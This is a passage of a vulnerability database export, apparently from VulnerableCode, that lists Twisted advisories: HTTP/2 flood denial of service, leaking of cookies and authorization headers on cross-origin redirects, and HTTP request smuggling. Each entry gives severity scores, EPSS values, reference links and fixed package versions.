6
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
7
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
url https://www.oracle.com/security-alerts/cpuapr2020.html
fixed_packages
0
url pkg:pypi/twisted@19.7.0rc1
purl pkg:pypi/twisted@19.7.0rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-qavz-rft9-7bfb
3
vulnerability VCID-qc7c-e5fb-77f1
4
vulnerability VCID-qtwh-as1r-6ka5
5
vulnerability VCID-rzad-s8tu-47gm
6
vulnerability VCID-tec3-uqmg-tueq
7
vulnerability VCID-vcw1-fzw7-43f5
8
vulnerability VCID-vz8r-fhqf-zudf
9
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@19.7.0rc1
aliases PYSEC-2019-59
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f9bv-6a83-eyb7
4
url VCID-qavz-rft9-7bfb
vulnerability_id VCID-qavz-rft9-7bfb
summary 
HTTP/2 DoS Attacks: Ping, Reset, and Settings Floods
Twisted web servers that utilize the optional HTTP/2 support suffer from the following flow-control related vulnerabilities.
references
0
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
1
reference_url https://github.com/twisted/twisted/commit/a40ab1ce5210f231abe7a448a54d7e88e48f2d5d
reference_id
reference_type
scores
0
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/a40ab1ce5210f231abe7a448a54d7e88e48f2d5d
2
reference_url https://github.com/advisories/GHSA-32gv-6cf3-wcmq
reference_id GHSA-32gv-6cf3-wcmq
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-32gv-6cf3-wcmq
3
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-32gv-6cf3-wcmq
reference_id GHSA-32gv-6cf3-wcmq
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/security/advisories/GHSA-32gv-6cf3-wcmq
fixed_packages
0
url pkg:pypi/twisted@19.10.0
purl pkg:pypi/twisted@19.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-qc7c-e5fb-77f1
3
vulnerability VCID-qtwh-as1r-6ka5
4
vulnerability VCID-rzad-s8tu-47gm
5
vulnerability VCID-tec3-uqmg-tueq
6
vulnerability VCID-vcw1-fzw7-43f5
7
vulnerability VCID-vz8r-fhqf-zudf
8
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@19.10.0
aliases GHSA-32gv-6cf3-wcmq, GMS-2022-410
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qavz-rft9-7bfb
5
url VCID-qc7c-e5fb-77f1
vulnerability_id VCID-qc7c-e5fb-77f1
summary twisted is an event-driven networking engine written in Python. In affected versions twisted exposes cookies and authorization headers when following cross-origin redirects. This issue is present in the `twited.web.RedirectAgent` and `twisted.web. BrowserLikeRedirectAgent` functions. Users are advised to upgrade. There are no known workarounds.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21712.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21712.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-21712
reference_id
reference_type
scores
0
value 0.00241
scoring_system epss
scoring_elements 0.47346
published_at 2026-04-13T12:55:00Z
1
value 0.00241
scoring_system epss
scoring_elements 0.4734
published_at 2026-04-12T12:55:00Z
2
value 0.00241
scoring_system epss
scoring_elements 0.47365
published_at 2026-04-11T12:55:00Z
3
value 0.00241
scoring_system epss
scoring_elements 0.47341
published_at 2026-04-09T12:55:00Z
4
value 0.00241
scoring_system epss
scoring_elements 0.47344
published_at 2026-04-08T12:55:00Z
5
value 0.00241
scoring_system epss
scoring_elements 0.47289
published_at 2026-04-07T12:55:00Z
6
value 0.00241
scoring_system epss
scoring_elements 0.47342
published_at 2026-04-04T12:55:00Z
7
value 0.00241
scoring_system epss
scoring_elements 0.47321
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-21712
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21712
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21712
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2022-27.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2022-27.yaml
5
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
6
reference_url https://github.com/twisted/twisted/commit/af8fe78542a6f2bf2235ccee8158d9c88d31e8e2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:57:40Z/
url https://github.com/twisted/twisted/commit/af8fe78542a6f2bf2235ccee8158d9c88d31e8e2
7
reference_url https://github.com/twisted/twisted/releases/tag/twisted-22.1.0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:57:40Z/
url https://github.com/twisted/twisted/releases/tag/twisted-22.1.0
8
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-92x2-jw7w-xvvx
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:57:40Z/
url https://github.com/twisted/twisted/security/advisories/GHSA-92x2-jw7w-xvvx
9
reference_url https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html
10
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-21712
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-21712
15
reference_url https://pypi.org/project/Twisted
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://pypi.org/project/Twisted
16
reference_url https://pypi.org/project/Twisted/
reference_id
reference_type
scores
url https://pypi.org/project/Twisted/
17
reference_url https://security.gentoo.org/glsa/202301-02
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.gentoo.org/glsa/202301-02
18
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2051865
reference_id 2051865
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2051865
19
reference_url https://security.archlinux.org/AVG-2663
reference_id AVG-2663
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-2663
20
reference_url https://github.com/advisories/GHSA-92x2-jw7w-xvvx
reference_id GHSA-92x2-jw7w-xvvx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-92x2-jw7w-xvvx
21
reference_url https://access.redhat.com/errata/RHSA-2022:0982
reference_id RHSA-2022:0982
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0982
22
reference_url https://access.redhat.com/errata/RHSA-2022:0992
reference_id RHSA-2022:0992
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0992
23
reference_url https://usn.ubuntu.com/5354-1/
reference_id USN-5354-1
reference_type
scores
url https://usn.ubuntu.com/5354-1/
fixed_packages
0
url pkg:pypi/twisted@22.1.0
purl pkg:pypi/twisted@22.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-rzad-s8tu-47gm
2
vulnerability VCID-tec3-uqmg-tueq
3
vulnerability VCID-vz8r-fhqf-zudf
4
vulnerability VCID-y7f5-9nmg-w7b3
5
vulnerability VCID-z5qm-2n25-e7g4
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@22.1.0
aliases CVE-2022-21712, GHSA-92x2-jw7w-xvvx, PYSEC-2022-27
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qc7c-e5fb-77f1
6
url VCID-qtwh-as1r-6ka5
vulnerability_id VCID-qtwh-as1r-6ka5
summary 
Twisted vulnerable to HTTP Request Smuggling Attacks
### Impact
Twisted Web is vulnerable to request smuggling attacks:

1. "When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero this caused Twisted Web to interpret the request body as a pipelined request. According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response." (Jake Miller of Bishop Fox Security)
2. " When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request. According to RFC 7230 Section 3.3.3#3, if a message with both content-length and chunked encoding is accepted, transfer-encoding overrides the content-length." (Jake Miller of Bishop Fox Security)
3. ~"Twisted should not allow BWS between the filed-name and colon." (ZeddYu Lu)~ _closed in 9646_
4. "Two CL header with different values is also not allowed." (ZeddYu Lu)
5. "Only accept identity and chunked Transport-Encoding." (ZeddYu Lu)

### Patches
https://github.com/twisted/twisted/commit/20c787a14a09e7cbd5dfd8df08ceff00d1fcc081
https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281

### Workarounds
N/A

### References
https://portswigger.net/web-security/request-smuggling
references
0
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
1
reference_url https://github.com/twisted/twisted/commit/20c787a14a09e7cbd5dfd8df08ceff00d1fcc081
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/20c787a14a09e7cbd5dfd8df08ceff00d1fcc081
2
reference_url https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281
3
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-8r99-h8j2-rw64
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/security/advisories/GHSA-8r99-h8j2-rw64
4
reference_url https://github.com/advisories/GHSA-8r99-h8j2-rw64
reference_id GHSA-8r99-h8j2-rw64
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8r99-h8j2-rw64
fixed_packages
0
url pkg:pypi/twisted@20.3.0
purl pkg:pypi/twisted@20.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-qc7c-e5fb-77f1
2
vulnerability VCID-rzad-s8tu-47gm
3
vulnerability VCID-tec3-uqmg-tueq
4
vulnerability VCID-vz8r-fhqf-zudf
5
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@20.3.0
aliases GHSA-8r99-h8j2-rw64, GMS-2022-5173
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qtwh-as1r-6ka5
7
url VCID-rzad-s8tu-47gm
vulnerability_id VCID-rzad-s8tu-47gm
summary Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to version 22.4.0rc1, the Twisted Web HTTP 1.1 server, located in the `twisted.web.http` module, parsed several HTTP request constructs more leniently than permitted by RFC 7230. This non-conformant parsing can lead to desync if requests pass through multiple HTTP parsers, potentially resulting in HTTP request smuggling. Users who may be affected use Twisted Web's HTTP 1.1 server and/or proxy and also pass requests through a different HTTP server and/or proxy. The Twisted Web client is not affected. The HTTP 2.0 server uses a different parser, so it is not affected. The issue has been addressed in Twisted 22.4.0rc1. Two workarounds are available: Ensure any vulnerabilities in upstream proxies have been addressed, such as by upgrading them; or filter malformed requests by other means, such as configuration of an upstream proxy.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-24801.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-24801.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-24801
reference_id
reference_type
scores
0
value 0.01051
scoring_system epss
scoring_elements 0.77546
published_at 2026-04-13T12:55:00Z
1
value 0.01051
scoring_system epss
scoring_elements 0.77529
published_at 2026-04-08T12:55:00Z
2
value 0.01051
scoring_system epss
scoring_elements 0.77549
published_at 2026-04-12T12:55:00Z
3
value 0.01051
scoring_system epss
scoring_elements 0.77564
published_at 2026-04-11T12:55:00Z
4
value 0.01051
scoring_system epss
scoring_elements 0.77538
published_at 2026-04-09T12:55:00Z
5
value 0.01051
scoring_system epss
scoring_elements 0.775
published_at 2026-04-07T12:55:00Z
6
value 0.01058
scoring_system epss
scoring_elements 0.77561
published_at 2026-04-02T12:55:00Z
7
value 0.01058
scoring_system epss
scoring_elements 0.77587
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-24801
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24801
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24801
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2022-195.yaml
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2022-195.yaml
5
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
6
reference_url https://github.com/twisted/twisted/commit/592217e951363d60e9cd99c5bbfd23d4615043ac
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://github.com/twisted/twisted/commit/592217e951363d60e9cd99c5bbfd23d4615043ac
7
reference_url https://github.com/twisted/twisted/releases/tag/twisted-22.4.0rc1
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://github.com/twisted/twisted/releases/tag/twisted-22.4.0rc1
8
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-c2jg-hw38-jrqq
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://github.com/twisted/twisted/security/advisories/GHSA-c2jg-hw38-jrqq
9
reference_url https://lists.debian.org/debian-lts-announce/2022/05/msg00003.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://lists.debian.org/debian-lts-announce/2022/05/msg00003.html
10
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
14
reference_url https://www.oracle.com/security-alerts/cpujul2022.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://www.oracle.com/security-alerts/cpujul2022.html
15
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009030
reference_id 1009030
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009030
16
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2073114
reference_id 2073114
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2073114
17
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K/
reference_id 7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7U6KYDTOLPICAVSR34G2WRYLFBD2YW5K/
18
reference_url https://security.archlinux.org/AVG-2663
reference_id AVG-2663
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-2663
19
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-24801
reference_id CVE-2022-24801
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
